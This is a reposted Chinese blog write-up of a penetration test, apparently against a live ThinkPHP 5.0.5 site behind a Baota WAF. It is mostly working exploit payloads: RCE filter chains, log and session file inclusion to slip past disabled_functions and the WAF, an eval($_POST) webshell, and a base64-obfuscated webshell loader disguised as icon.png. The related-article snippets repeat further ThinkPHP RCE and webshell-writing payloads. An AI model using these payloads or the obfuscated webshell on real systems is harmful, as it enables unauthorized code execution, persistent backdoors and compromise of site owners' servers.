phpinfo 命令执行函数被禁用绕过tips

最新推荐文章于 2023-06-23 14:36:26 发布
最新推荐文章于 2023-06-23 14:36:26 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: # tips # 挖掘技巧 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/125098106
版权

原文出处:记一次TP测试 - 先知社区 (aliyun.com)

一、简单的信息收集
尝试路径报错,获取目标版本和配置信息。

https://example.com/admin/indeeex/login.html

版本为5.0.5,开启debug。
 


直接执行payload,宝塔拦截

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

尝试post执行paylaod

_method=__construct&method=get&filter=call_user_func&get[]=phpinfo

成功执行,php5的assert默认存在代码执行,php7默认不存在。

禁用函数 

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

不能直接执行命令,尝试日志包含和session包含拿shell。
二、日志包含尝试寻找日志路径配合之前路径报错获取的根路径。

https://example.com/runtime/log/202111/17.log

对日志进行包含

_method=__construct&method=get&filter=think\__include_file&get[]=/www/wwwroot/taizi/runtime/log/202110/28.log

 

简单看一下访问记录是否能够写入日志,访问

https://example.com/phpinfo

可以正常写入

但是在写入函数的时候被拦截

https://example.com/phpinfo()

 

 正常payload这被拦截

_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>

三、session包含

_method=__construct&filter[]=think\Session::set&method=get&get[]=eeee&server[]=1

 修改一下phpsessionid为1111,进行session包含,可以看到正常写入。

_method=__construct&method=get&filter=think\__include_file&get[]=/tmp/sess_1111

 但是如果直接写入shell的话会被拦截

所以这里尝试对payload进行加密处理。
使用以下payload

_method=__construct&method=get&filter=think\Session::set&get[]=<?PHP
$str="PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBheWxvYWROYW1lPSdwYXlsb2FkJzsKJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7CiRkYXRhPWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwppZiAoJGRhdGEhPT1mYWxzZSl7CiAgICAkZGF0YT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0pKXsKICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7CgkJZXZhbCgkcGF5bG9hZCk7CiAgICAgICAgZWNobyBlbmNvZGUoQHJ1bigkZGF0YSksJGtleSk7CiAgICB9ZWxzZXsKICAgICAgICBpZiAoc3RyaXBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9";
file_put_contents('/www/wwwroot/taizi/icon.png',base64_decode("$str"));;

 未被拦截,但是在包含的时候出问题了,试了好多次大大概的原因就是<和"两个符号会导致解析的时候出问题。

尝试对所有payload加密使用伪协议读取内容,但是在使用伪协议对时候又被拦截。

 这时候可以尝试使用函数,将伪协议反序。

_method=__construct&filter[]=think\Session::set&method=get&get[]=aaPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYWJjJ10pKTs/Pg&server[]=1

成功执行。

最后要写shell的话直接将shell加密,再将代码加密即可写入。

file_put_contents('/www/wwwroot/test123.php',base64_decode("PD9waHAgcGhwaW5mbygpOz8+"));

 

yggcwhat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php中函数禁用绕过的原理与利用1
08-03
值得注意的是,某些不受`open_basedir`影响的函数,如命令执行函数`system`,可以用来绕过限制。我们还可以寻找替代函数,例如使用反引号(`)来执行命令,以达到类似`system`的效果。 在研究如何绕过`disable_...
一次实战中对tp5网站getshell方式的测试
渗透测试研究中心
01-12 771
0x00 前言之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。0x02 正文拿到站点后,访问首页如下测试中,发现是thinkphp的站,报错如下不过看不出来具体版本,不确定是否存在RCE,于是...
极客大挑战2021-部分wp
qq_53460654的博客
12-15 1433
DARK 看到后缀去搜然后洋葱浏览器下载打开即可. SYC{hav3_fUn_1n_darK} welcome2021 f12看到提示后,改为welcom的请求方式,直接curl -X 改请求方式。 访问fllllaaaggg9.php发现这是个跳转页面,抓包发送一次得到flag SYC{WeLcom3_t0_Geek_2o21!!} babysql 简单试了试1’union select 1,2,3,4#,发现有两个回显点 先爆数据库 1'union select group_concat(schem
一次TP测试
HBohan的博客
11-24 2810
一、简单的信息收集 尝试路径报错,获取目标版本和配置信息。 https://example.com/admin/indeeex/login.html 版本为5.0.5,开启debug。 直接执行payload,宝塔拦截 /index.php? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=a ssert&vars[1][]=phpinfo() 【网络安全 全套学习资料·攻略】文字末
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8264
ThinkPHP5系列远程代码执行漏洞复现(详细)
记一次tp5.0.9RCE
weixin_43570648的博客
09-21 296
目标 常规报错 直接说版本tp5.0.9,然后尝试payload _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo 顺便看了哈disable_function 基本执行命令的payload都被禁了 还好payload多,直接拿下 s=file_put_contents(‘dd.php’,’<?php @eval($_POST[1]);’)&_method=__
PHP提示Warning:phpinfo() has been disabled函数禁用的解决方法
10-25
在PHP编程过程中,有时会遇到警告“PHP Warning: phpinfo() has been disabled for security reasons”,这意味着phpinfo()函数禁用,通常这是出于安全考虑,防止敏感信息泄露。要解决这个问题,我们需要理解PHP...
php禁用函数设置及查看方法详解
10-21
在PHP中,禁用函数是一项安全措施,用于防止潜在有害或不安全的函数在服务器环境中被执行。这通常在共享主机环境中执行,以保护服务器免受恶意脚本的攻击。禁用函数列表可以在PHP配置文件`php.ini`中进行设置。 要...
phpinfo 系统查看参数函数代码
10-29
使用 `getmicrotime()` 函数获取页面开始执行的微秒时间戳,然后在页面执行完毕后再次调用此函数,两者相减即可得到页面的执行时间。这有助于开发者了解脚本的性能。 2. **邮件通知**: 当用户访问页面且已设置过...
解析如何屏蔽php中的phpinfo()函数
10-27
3. **添加`phpinfo`到禁用函数列表**:找到`disable_functions`行后,去掉其前导分号(如果有的话,分号表示注释),然后在已有的函数列表后面添加`phpinfo`。确保没有多余的空格或者逗号。最终的配置可能类似这样:...
ThinkPHP5.0.23 远程代码执行漏洞
cyzCc的博客
02-15 5549
靶场地址【安鸾渗透实战平台】http://www.whalwl.cn:8031 提示:flag在服务器根目录 直接在kali里面搜索ThinkPHP5.0.23相关漏洞 发现了 Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 在最下面发现该版本payload (post)public/index.php?s=captcha (data) ...
php通用漏洞phpinfo,ThinkPHP5.0 captcha 调用phpinfo bug 远程代码执行漏洞解决方案
weixin_33778479的博客
03-11 608
该漏洞可以直接远程代码执行,getshell提权写入网站木马到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。攻击者可以伪造远程恶意代码,利用漏洞对服务器进行post提交数据。首先打开网站会从app.php代码里将请...
php禁用了所有命令执行函数 怎么搞,PHP通过bypass disable functions执行系统命令的方法汇总...
weixin_39986973的博客
03-11 766
一、为什么要bypass disable functions为了安全起见,很多运维人员会禁用PHP的一些“危险”函数,例如eval、exec、system等,将其写在php.ini配置文件中,就是我们所说的disable functions了,特别是虚拟主机运营商,为了彻底隔离同服务器的客户,以及避免出现大面积的安全问题,在disable functions的设置中也通常较为严格。攻与防是对立的,...
使用php -i或者phpinfo()查看php安装、配置信息
热门推荐
书山路遥
03-05 3万+
在php开发过程中,经常需要查看php相关信息,例如php版本、php扩展安装情况、php配置文件路径等等。本文将介绍使用php -i命令phpinfo()两种方式,希望可以帮助到大家。 使用前提 你必须正确的安装了php。 在windows下使用命令 后面的内容会在控制台中执行一些命令,对于Linux&amp;Mac的同学来说,只要正确安装了php,直接执行命令就好,但对于Windows下...
assert()执行phpinfo()之[NPUCTF2020]ReadlezPHP1
qq_58970968的博客
08-11 294
避免由程序运行引起更大的错误)如果assert里面的值成立,那么就执行,否则中断程序;就可以使用assert(phpinfo());
PHP常见的命令执行函数与代码执行函数
最新发布
dys的博客
06-23 5540
命令执行与代码执行
Thinkphp5-0-X远程代码执行漏洞
qq_40624810的博客
11-09 814
参考博客:https://www.cnblogs.com/303donatello/p/12721587.html https://blog.csdn.net/qq_45521281/article/details/105907276 其实后面的&test=-1参数没有意义,只要有captcha就行 在post里加上我们要提交的参数 _method=__construct&filter[]=phpinfo&method=GET 提交...
thinkPHP5 最新代码执行漏洞
xiaoziabc的博客
01-13 2804
s=captcha _method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_method]=dir   http://127.0.0.1/tp5.0.12_full/public/index.php?s=index/\think\app/invokefunction&amp;function=call...
Glide加载图片显示不出
qq_44482764的博客
10-29 931
利用Glide加载图片一直加载不出来 网络已经配置 <uses-permission android:name="android.permission.INTERNET"/> 还是没有用 Glide.with(mContext) .load("http://res.lgdsunday.club/poster-1.png") .placeholder(R.mipmap.logo) .error(R.mipmap.web_error)
PHP函数禁用绕过策略:实战分析与技巧
在PHP编程中,"php中函数禁用绕过的原理与利用1"这篇文档深入探讨了如何在面临函数禁用(disable_functions)的情况下,进行有效的情景应对。PHP的disable_functions配置允许开发者限制脚本中可用的特定函数,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值